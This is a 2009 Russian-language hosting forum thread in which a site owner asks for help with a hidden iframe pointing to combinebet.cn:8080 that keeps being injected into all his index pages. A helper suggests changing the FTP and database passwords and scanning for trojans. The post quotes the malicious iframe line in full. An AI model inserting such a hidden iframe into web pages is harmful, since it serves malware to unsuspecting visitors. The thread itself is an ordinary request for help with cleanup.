Ayola.net
Новости: В связи с обилием спама, постинг на форуме временно закрыт.

Для связи с поддержкой используйте тикеты в панели управления.

*
Добро пожаловать, Гость. Пожалуйста, войдите или зарегистрируйтесь. Май 25, 2017, 02:46:36

Войти

Страниц: [1]
  Печать  
Автор Тема: Левый код прописывется в index  (Прочитано 3788 раз)
positiveman
Новичёк
*

Просмотр профиля
« : Июнь 03, 2009, 22:27:36 »

Привет всем! Такая у меня беда: код "<iframe src="http://combinebet.cn:8080/index.php" width=184 height=123 style="visibility: hidden"></iframe>" прописывается у меня сразу после <body> и затерает часть моего кода. В результате при открытии всех индексных страниц антивирусник начинает материться, да и половина не открывается.

У меня раньше была такая ситуация, мне сказали, что это вирус на моем компе. Но файлы были залиты на сервер давно, и код был нормальным, все работало. Если это вирус, то он мог пролезть во время фтп соединения, но я довольно долго уже не соединялся через фтп с сайтом (около недели), как вдруг у меня снова во всех индексах пропися вражеский код!!! Я конечно его уже исправил, но это не дело, надо же бороться как-то (а то на сайте 2 индексных страници и на форуме штук 100. Обламывает заменять их на рабочие)!

Кто сталкивался с такой проблемой? Подскажите что это может быть? Вирус или фтп взлом?
 Грустный Непонимающий Грустный
Константин Абрамов
Просветлённый

Нужен сайт? Нет проблем!

Просмотр профиля WWW
« Ответ #1 : Июнь 03, 2009, 23:00:02 »

А чем вас два варианта сразу не устраивают? Может быть и взлом, и вирус как следствие этого взлома. Мой антивирус (Avast) вполне себе кричит, что это троян. Смените пароли на FTP и мускуль + просканируйте свой ПК на предмет всякой заразы.

ШкольнЕГИ, вам за книжки, а не ко мне в ICQ со своими движковыми проблемами. Бесплатно ни на кого не работаю. Учитесь уважать чужое время и труд!
positiveman
Новичёк
*

Просмотр профиля
« Ответ #2 : Июнь 04, 2009, 18:08:21 »

Аха! Спасибо! Просканирую, этим уже и занимаюсь. Вот только с паролями проблема будет, мне никак не хотят их менять. Говорят, что письмо с инструкцией выслано на емейл, а там его нет.
Константин Абрамов
Просветлённый

Нужен сайт? Нет проблем!

Просмотр профиля WWW
« Ответ #3 : Июнь 04, 2009, 18:12:17 »

Попробуйте либо в папке со спамом посмотреть, либо просто несколько раз сбросьте пароли. Не всегда сразу доходит письмо, к сожалению.

ШкольнЕГИ, вам за книжки, а не ко мне в ICQ со своими движковыми проблемами. Бесплатно ни на кого не работаю. Учитесь уважать чужое время и труд!
positiveman
Новичёк
*

Просмотр профиля
« Ответ #4 : Июнь 05, 2009, 22:10:35 »

Я смотрел в спаме. Там нет.
Страниц: [1]
  Печать  

Перейти в: